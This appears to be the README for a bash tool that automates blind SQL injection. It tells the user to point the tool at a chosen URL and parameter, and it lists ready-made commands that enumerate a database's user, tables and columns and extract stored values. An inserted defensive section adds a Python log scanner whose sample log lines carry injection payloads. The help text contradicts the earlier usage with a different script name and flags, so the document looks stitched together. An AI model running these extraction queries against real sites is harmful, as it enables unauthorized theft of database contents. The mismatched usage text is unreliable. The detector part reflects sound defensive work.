This is a bash script made for automating the exploitation of Blind SQL Injection vulnerabilities.
HIGHLY RECOMMENDED: RUN THE QUERY "@@version" FIRST TO SEE WHICH DATABASE VERSION IS IN USE, SO YOU CAN SEND THE APPROPRIATE QUERIES.
CHANGE THE URL on the 5th line to the one that you want to use.
CHANGE THE ?band=the offspring' on the 20th line to "?<vulnerable parameter>=<value>' ".
CHANGE THE truestring variable to the string you obtain when a normal (non-injected) request succeeds.
bash blindSQLi.sh 20 "Select user()"
bash blindSQLi.sh 20 "Select database()" #show the actual database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 0,1 " #show 1st table name of a database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 1,1 " #show 2nd table name of a database, and so on...
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 0,1 " #show the 1st column name of a table.
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 1,1 " #show the 2nd column name of a table and so on...
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2) FROM TABLEname limit 0,1 " #extract the 1st value of 2 columns from a table.
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2, '---', COLUMN3) FROM TABLEname limit 1,1 " #extract the 2nd value of 3 columns from a table and so on...
Where 20 is the maximum number of characters we expect in the response, and what is inside the quotes is the query that you want to run.
You can use a query cheatsheet like the ones on the PentestMonkey webpage.
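The queries listed above leave a recognisable trail in web-server access logs once the request URL is decoded: information_schema lookups, @@version probes, substring()/ascii() comparisons and a quote followed by AND, repeated once per character guessed. As an added example, not part of the original script, here is a small Python log scanner that flags such requests and counts them per source IP, which is how a defender would notice this kind of boolean-based extraction in progress. The log lines, IP addresses and the /banddetails.php path (borrowed from the help text) are constructed sample data.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed combined-format access log (not from the page): two benign requests and
# two carrying the kind of payload a boolean-based blind extraction produces.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /banddetails.php?band=20 HTTP/1.1" 200 1432
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /banddetails.php?band=20'%20and%20substring((select%20@@version),1,1)='5 HTTP/1.1" 200 1432
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /banddetails.php?band=20'%20and%20ascii(substring((SELECT%20table_name%20FROM%20information_schema.tables%20limit%200,1),1,1))>64 HTTP/1.1" 200 1432
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /banddetails.php?band=21 HTTP/1.1" 200 1390
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Tokens typical of the queries a blind-extraction script sends; (label, pattern) pairs.
INDICATORS = [
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("substring_probe", re.compile(r"\b(substring|substr|mid)\s*\(", re.I)),
    ("ascii_compare", re.compile(r"\bascii\s*\(", re.I)),
    ("identity_func", re.compile(r"\b(user|database|current_user)\s*\(\s*\)", re.I)),
    ("quote_and", re.compile(r"'\s*(and|or)\s+", re.I)),
]


def decode_path(path: str) -> str:
    """URL-decode the request path twice so single and double encoding both surface."""
    return unquote_plus(unquote_plus(path))


def scan_line(line: str):
    """Return a finding dict for one log line, or None if it is unparsable or benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_path(m.group("path"))
    hits = [label for label, rx in INDICATORS if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": decoded, "indicators": hits}


def scan_log(text: str):
    """Scan a whole log body and return the list of findings in file order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


def suspicious_ips(findings, threshold: int = 2):
    """Clients with at least `threshold` flagged requests; blind extraction needs many."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], ",".join(f["indicators"]), f["path"])
    print("suspicious clients:", suspicious_ips(found))
```

The per-IP count matters more than any single match: one request containing substring() could be a false positive, but dozens from one client against the same parameter, each differing by one comparison value, is the signature of character-by-character extraction. The same indicator list can be fed to a WAF rule or a SIEM query; decoding before matching is what keeps %20 and double-encoded payloads from slipping past.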
-u, --url The URL to query, f. ex: http://webpage.com/banddetails.php
-i, --id The ID parameter to use in the URL, f. ex: ?band=20
-t, --truestring The response that the web application shows when a request is successful, f. ex: We worked with them in the past
-m, --maxlength The maximum length of the substring to extract, f. ex: 20
-q, --query The SQL query to extract the substring from, see PentestMonkey SQL injection cheatsheets
-h, --help Show this help panel
./blind.sh -u http://webpage.com/banddetails.php -i "?band=20" -t "We worked with them in the past" -m 30 -q "Select user()"